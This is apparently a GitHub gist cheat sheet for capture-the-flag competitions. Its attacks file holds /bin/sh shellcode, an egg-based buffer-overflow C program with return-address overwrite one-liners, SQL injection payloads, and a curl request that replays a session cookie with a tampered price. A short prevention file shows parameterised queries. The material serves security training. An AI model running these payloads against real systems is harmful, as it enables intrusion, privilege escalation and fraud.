sailik1991/0.0 CaptureTheFlag-CheetSheet.md

## 0.0 CaptureTheFlag-CheetSheet.md

      
    Raw
  

              0.0 CaptureTheFlag-CheetSheet.md
            
          
[Attacks] (https://gist.github.com/sailik1991/c1d030edb98de7fead62061b5386c773#file-attacks-md)
[Prevention] (https://gist.github.com/sailik1991/c1d030edb98de7fead62061b5386c773#file-prevention-md)


## attacks.md

      
    Raw
  

              attacks.md
            
          
    Commands for exploiting software vulnerabilities


Dot-dot and directory traversal attacks
Linking
Binary to ASM
[View strings in binary](#view strings-in-binary)
Checking system calls
Debugging with GDB
Shell code for /bin/sh from shell-storm
Buffer overflow
SQL Injection cheat sheet
Making client side requests
xinetd

Dot-dot and directory traversal attacks

This is where noobs start.  If you are not sure what this is, this guide might not make much sense to you.
Linking

ls -sf /tmp/target /tmp/link
Binary to ASM

Using objdump
objdump -S binary.out | less

Pic - Adam Doupe
View strings in binary

Using strings
strings binary.out
#or
objdump -s binary.out | less
Checking system calls

Man for ltrace and strace.
ltrace -f binary.out
strace -f binary.out
Debugging with GDB

(tutorial)
r binary.out
b <line_number/memory_address>
c (continues)
attach (ongoing process)
set detach-on-fork off (attach to forked child)

Ensuring same address works in debug mode and runtime is extremely important.  Use this utility to make sure that the environment and argument stack remains the same in both the modes.

Invocation:

$ invoke.sh binary.out         # just call the executable
$ invoke.sh -d binary.out      # run the executable in GDB

Utility invoke.sh (don't forget to chmod +x invloke.sh)

!/bin/sh

while getopts "dte:h?" opt ; do
  case "$opt" in
    h|\?)
      printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
      exit 0
      ;;
    t)
      tty=1
      gdb=1
      ;;
    d)
      gdb=1
      ;;
    e)
      env=$OPTARG
      ;;
  esac
done

shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
  if [ -n "$tty" ]; then
    touch /tmp/gdb-debug-pty
    exec env - $env TERM=screen PWD=$PWD gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
  else
    exec env - $env TERM=screen PWD=$PWD gdb --args $prog "$@"
  fi
else
  exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi
Ref - stackoverflow
Shell code for /bin/sh from shell-storm

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

Buffer overflow

Create a new shell code that injects your code ('/bin/sh') into a new env variable, and invokes the corresponding shell.  (tutorial)
/* eggcode.c */
#include <unistd.h>
#define NOP 0x90
 
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x64\x55"
"\x55\x4d\x68\x41\x68\x6d\x61\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e"
"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
 
int main(void)
{
  char shell[512];
 
  puts("Eggshell loaded into environment.\n");
  memset(shell,NOP,512);     /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
  memcpy(&shell[512-strlen(shellcode)],shellcode,strlen(shellcode));
  /* set the environment variable to */
  /* EGG and shell as its value, rewrite if needed */
  setenv("EGG", shell, 1);
  /* modify the variable */
  putenv(shell);
  /* invoke the bash */
  system("bash");
  return 0;
}
Gets address of the first instruction of the malacious code
/* findeggaddr.c */
#include <unistd.h>
 
int main(void)
{
  printf("EGG address: 0x%lx\n", getenv("EGG"));
  return 0;
}
Exploit using overflow buffer - calculate stack address and inject using python or perl script.  Eg.
`python -c "print 'A'x516 + '\x73\xf5\xff\xbf'"`
`perl -e 'print "A"x516'``printf "\x73\xf5\xff\xbf"`

Please keep in mind

Endianess (inverse memory address)
checking env after injecting shell code
size of datatypes (char-1, int-4, float-8, double-16 etc.) when overflowing buffers


Declaration
Allocation in memory


first
lower mem address


last
higher mem address


Pic - Adam Doupe

SQL Injection cheat sheet

Checking for SQL injection:

Normal

' or 1=1 --

Blind returns same response for both if there is a user with user_name h4x0r

pressRelease.jsp?id=5
pressRelease.jsp?id=5 AND user_name()=‘h4x0r’

Second Order injection
Set user to john-- and change actual john's password using:

update users set password= … where username ='john'--'
Please ensure you see the cheat sheet for the correct technology.  Here is the one for MySQL.
Making client side requests


curl

curl -H 'header=value' <ip/hostname>:<port>
curl -b PHPSESSID=n7591kbbse8rug4dfn019skv05 -F oid=5929 -F price=2500 -F cur=usd http://192.168.84.167/code/purchase.php

netcat (nc)

nc <destination> <port> < input.txt #sending data to stdin
xinetd


Executable in /etc/xinetd.d

service <service_name>
{
        socket_type     = stream
        protocol        = tcp
        user            = <user_executing_this>
        wait            = no
        server          = /<path_to_binary>/<binary_with_x_permissions>
        log_type        = SYSLOG daemon debug
}


Add service to /etc/services

<service_name>       11000/tcp


Restart xinetd (we only need to do this if we change name of executable after patch)

sudo /etc/init.d/xinetd restart

  
## prevention.md

      
    Raw
  

              prevention.md
            
          
    Preventing vulnerabilites


XSS prevention cheat-sheet
SQL injection prevention cheat-sheet

Specify query structure and then provide parameters
$stmt = $db->prepare("select * from `users` where `username` = :name and `password` = SHA1( CONCAT(:pass, `salt`)) limit 1;"); 
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);

PHP, the worst framework's cheat-sheet


Remote OS command execution - escapeshellcmd($str)